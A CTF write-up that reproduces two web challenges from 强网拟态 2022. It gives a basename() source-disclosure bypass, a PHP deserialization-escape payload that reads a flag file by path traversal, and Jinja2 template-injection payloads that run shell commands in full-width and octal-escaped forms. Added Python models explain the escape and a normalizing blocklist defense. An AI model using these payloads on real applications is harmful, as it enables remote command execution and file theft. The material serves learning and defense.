强网拟态 2022 Web challenge reproductions

ezus


<?php
include 'tm.php'; // the next step is in tm.php
if (preg_match('/tm\.php\/*$/i', $_SERVER['PHP_SELF']))
{
    exit("no way!");
}
if (isset($_GET['source']))
{
    $path = basename($_SERVER['PHP_SELF']);
    if (!preg_match('/tm.php$/', $path) && !preg_match('/index.php$/', $path))
    {
        exit("nonono!");
    }
    highlight_file($path);
    exit();
}
?>
<a href="index.php?source">source</a>

Bypass using an invisible (non-ASCII) character

/index.php/tm.php/%dfsource

The bypass works because of how basename() behaves on Linux: if the filename it obtains begins with a character outside the ASCII range, basename() discards that filename and moves up one level, taking the previous path component instead, until it reaches a filename that begins with a normal, printable ASCII character (on Windows the filename is returned directly).

This trick and the next one appeared in a similar earlier challenge: (https://blog.csdn.net/mochu7777777/article/details/127216646)

Source obtained:


<?php
class UserAccount
{
    protected $username;
    protected $password;

    public function __construct($username, $password)
    {
        $this->username = $username;
        $this->password = $password;
    }
}

function object_sleep($str)
{
    $ob = str_replace(chr(0).'*'.chr(0), '@0@0@0@', $str);
    return $ob;
}

function object_weakup($ob)
{
    $r = str_replace('@0@0@0@', chr(0).'*'.chr(0), $ob);
    return $r;
}

class order
{
    public $f;
    public $hint;

    public function __construct($hint, $f)
    {
        $this->f = $f;
        $this->hint = $hint;
    }

    public function __wakeup()
    {
        // something in hint.php
        if ($this->hint != "pass" || $this->f != "pass") {
            $this->hint = "pass";
            $this->f = "pass";
        }
    }

    public function __destruct()
    {
        if (filter_var($this->hint, FILTER_VALIDATE_URL))
        {
            $r = parse_url($this->hint);
            if (!empty($this->f)) {
                if (strpos($this->f, "try") !== false && strpos($this->f, "pass") !== false) {
                    @include($this->f . '.php');
                } else {
                    die("try again!");
                }
                if (preg_match('/prankhub$/', $r['host'])) {
                    echo $this->hint;
                    @$out = file_get_contents($this->hint);
                    echo "\n" . $out;
                } else {
                    die("\nerror");
                }
            } else {
                die("try it!");
            }
        } else {
            echo "Invalid URL";
        }
    }
}

$username = $_POST['username'];
$password = $_POST['password'];
$user = serialize(new UserAccount($username, $password));
unserialize(object_weakup(object_sleep($user)));
?>

Deserialization escape
payload:

username=@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@&password=";s:11:"%00*%00password";O:5:"order":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:55:"succ://prankhub/../../../../../../../f1111444449999.txt";}
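Why the payload above works, and the check that would have stopped it, as an added Python model (not code from the challenge or from this writeup): it re-implements serialize() for the page's UserAccount class, the page's object_sleep()/object_weakup() pair, and a minimal reader for PHP's serialization format that records which classes have already been instantiated by the time parsing fails. The names php_serialize_user(), PhpUnserializer and audit() are assumptions of this example; both sample inputs are constructed, the second one from the page's payload with literal NUL bytes in place of %00.

```python
NUL = "\x00"
PROT = NUL + "*" + NUL   # prefix PHP puts in front of protected property names
MARK = "@0@0@0@"         # the 7-byte placeholder used by the page's object_sleep()


def php_serialize_user(username, password):
    """Mimic serialize(new UserAccount($u, $p)) for the page's class (ASCII input)."""
    def s(v):
        return 's:%d:"%s";' % (len(v), v)
    props = s(PROT + "username") + s(username) + s(PROT + "password") + s(password)
    return 'O:11:"UserAccount":2:{%s}' % props


def object_sleep(data):
    return data.replace(PROT, MARK)


def object_weakup(data):
    return data.replace(MARK, PROT)


class PhpUnserializer:
    """Minimal reader for N/i/b/s/a/O values. Every object header reached is
    recorded in self.created: that is what has already been instantiated
    when a later syntax error makes parsing give up."""

    def __init__(self, data):
        self.d, self.i, self.created = data, 0, []

    def expect(self, tok):
        if not self.d.startswith(tok, self.i):
            raise ValueError("expected %r at offset %d" % (tok, self.i))
        self.i += len(tok)

    def read_until(self, ch):
        j = self.d.index(ch, self.i)          # ValueError if the delimiter is missing
        out, self.i = self.d[self.i:j], j + 1
        return out

    def value(self):
        if self.i >= len(self.d):
            raise ValueError("unexpected end of data")
        t = self.d[self.i]
        if t == "N":
            self.expect("N;")
            return None
        if t in "ib":
            self.expect(t + ":")
            return int(self.read_until(";"))
        if t == "s":
            self.expect("s:")
            n = int(self.read_until(":"))
            self.expect('"')
            out = self.d[self.i:self.i + n]   # trusts the declared length, like PHP
            self.i += n
            self.expect('";')
            return out
        if t in "aO":
            cls = None
            if t == "a":
                self.expect("a:")
            else:
                self.expect("O:")
                self.read_until(":")           # class-name length, not needed here
                self.expect('"')
                cls = self.read_until('"')
                self.expect(":")
                self.created.append(cls)       # the object exists from here on
            n = int(self.read_until(":"))
            self.expect("{")
            items = {}
            for _ in range(n):
                k = self.value()
                items[k] = self.value()
            self.expect("}")
            return items if cls is None else ("object", cls, items)
        raise ValueError("unknown type %r at offset %d" % (t, self.i))

    def parse(self):
        v = self.value()
        if self.i != len(self.d):
            raise ValueError("trailing data at offset %d" % self.i)
        return v


def audit(username, password):
    """Run the page's pipeline on one POST body and return
    (did the filters change the byte count?, classes instantiated, parse error or None).
    A changed byte count is the signal a defender can refuse before unserialize()."""
    raw = php_serialize_user(username, password)
    cooked = object_weakup(object_sleep(raw))
    p = PhpUnserializer(cooked)
    try:
        p.parse()
        return len(cooked) != len(raw), p.created, None
    except ValueError as e:
        return len(cooked) != len(raw), p.created, str(e)


# Constructed inputs: a benign login, and the page's escape payload (seven
# markers in the username, the injected tail in the password, real NULs).
ESCAPE_USERNAME = MARK * 7
ESCAPE_PASSWORD = ('";s:11:"' + PROT + 'password";O:5:"order":2:{s:1:"f";s:7:"trypass";'
                   's:4:"hint";s:55:"succ://prankhub/../../../../../../../f1111444449999.txt";}')

if __name__ == "__main__":
    print("benign:", audit("alice", "secret"))
    print("escape:", audit(ESCAPE_USERNAME, ESCAPE_PASSWORD))
```

For a benign login the two replacements cancel out, the byte count is unchanged and only UserAccount is created. For the payload, each 7-byte `@0@0@0@` in the username becomes the 3-byte `\0*\0` after the round trip, so the string shrinks by 28 bytes while the username's declared `s:49` stays; the reader therefore swallows the real password header and continues into the attacker-supplied `order` object, which the model records as instantiated before it fails on the trailing `";}`. Refusing to unserialize when the filtered string's length differs from the original (or applying the replacement to the values before serialize() rather than after) closes that gap.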

没有人比我更懂py (Nobody understands py better than me)

Bypass by converting half-width characters to full-width.

{{lipsum.__globals__['os'].popen('cat /flag').read()}}

Alternatively, bypass with octal escapes.

word = 'class'
poc = ''
for ch in word:
    # oct() gives e.g. '0o143'; drop the '0o' prefix and emit it as \\143
    poc += '\\\\' + oct(ord(ch))[2:]
print(poc)
{{()["__\\143\\154\\141\\163\\163__"]["__\\155\\162\\157__"][1]["__\\163\\165\\142\\143\\154\\141\\163\\163\\145\\163__"]()[247]["__\\151\\156\\151\\164__"]["__\\147\\154\\157\\142\\141\\154\\163__"]["\\157\\163"]["\\160\\157\\160\\145\\156"]("\\143\\141\\164\\40\\57\\146\\154\\141\\147")["\\162\\145\\141\\144"]()}}
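The defender's side of both bypasses in this section (the full-width trick and the octal trick), as an added Python example that is not code from the original writeup: a plain substring blocklist is shown letting both encodings through, and a normalizing check (NFKC folding plus octal-escape decoding before matching) catches them. The blocklist words, the to_fullwidth() helper and the function names are assumptions of this example; the full-width input is rebuilt from the ASCII payload, and the octal input reuses only the opening of the page's octal payload.

```python
import re
import unicodedata

# Words a naive template filter might refuse (constructed list for this example).
BLOCKLIST = ("class", "globals", "popen", "subclasses")

# Matches \143 or \\143, the octal form the page's second payload uses.
OCTAL_ESCAPE = re.compile(r"\\\\?([0-7]{1,3})")


def to_fullwidth(text):
    """Map printable ASCII to the U+FF01..U+FF5E full-width block (space to U+3000),
    i.e. the half-width to full-width conversion the page describes."""
    out = []
    for c in text:
        if c == " ":
            out.append("\u3000")
        elif 0x21 <= ord(c) <= 0x7E:
            out.append(chr(ord(c) + 0xFEE0))
        else:
            out.append(c)
    return "".join(out)


def normalize(payload):
    """Fold both encodings back to ASCII before matching: NFKC maps full-width
    letters and punctuation to their ASCII forms, then octal escapes are decoded.
    The result is used only for matching, never handed to the template engine."""
    folded = unicodedata.normalize("NFKC", payload)
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), folded)


def naive_blocked(payload):
    """Substring match on the raw input: what the page's two payloads get past."""
    return any(word in payload for word in BLOCKLIST)


def hardened_blocked(payload):
    """The same blocklist applied after normalization."""
    return any(word in normalize(payload) for word in BLOCKLIST)


# Constructed inputs modelled on the page.
ASCII_PAYLOAD = "{{lipsum.__globals__['os'].popen('cat /flag').read()}}"
FULLWIDTH_PAYLOAD = to_fullwidth(ASCII_PAYLOAD)
OCTAL_PAYLOAD = r'{{()["__\\143\\154\\141\\163\\163__"]["__\\155\\162\\157__"]}}'

if __name__ == "__main__":
    for name, p in [("fullwidth", FULLWIDTH_PAYLOAD), ("octal", OCTAL_PAYLOAD),
                    ("benign", "{{ user.name }}")]:
        print(name, "naive:", naive_blocked(p), "hardened:", hardened_blocked(p))
```

Normalizing before matching is only a stopgap: a blocklist is still a blocklist, and the durable fix is to keep user input out of the template source altogether (render it as data, not as template text).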

References

https://www.bilibili.com/read/cv19571698
https://www.ctfiot.com/70190.html
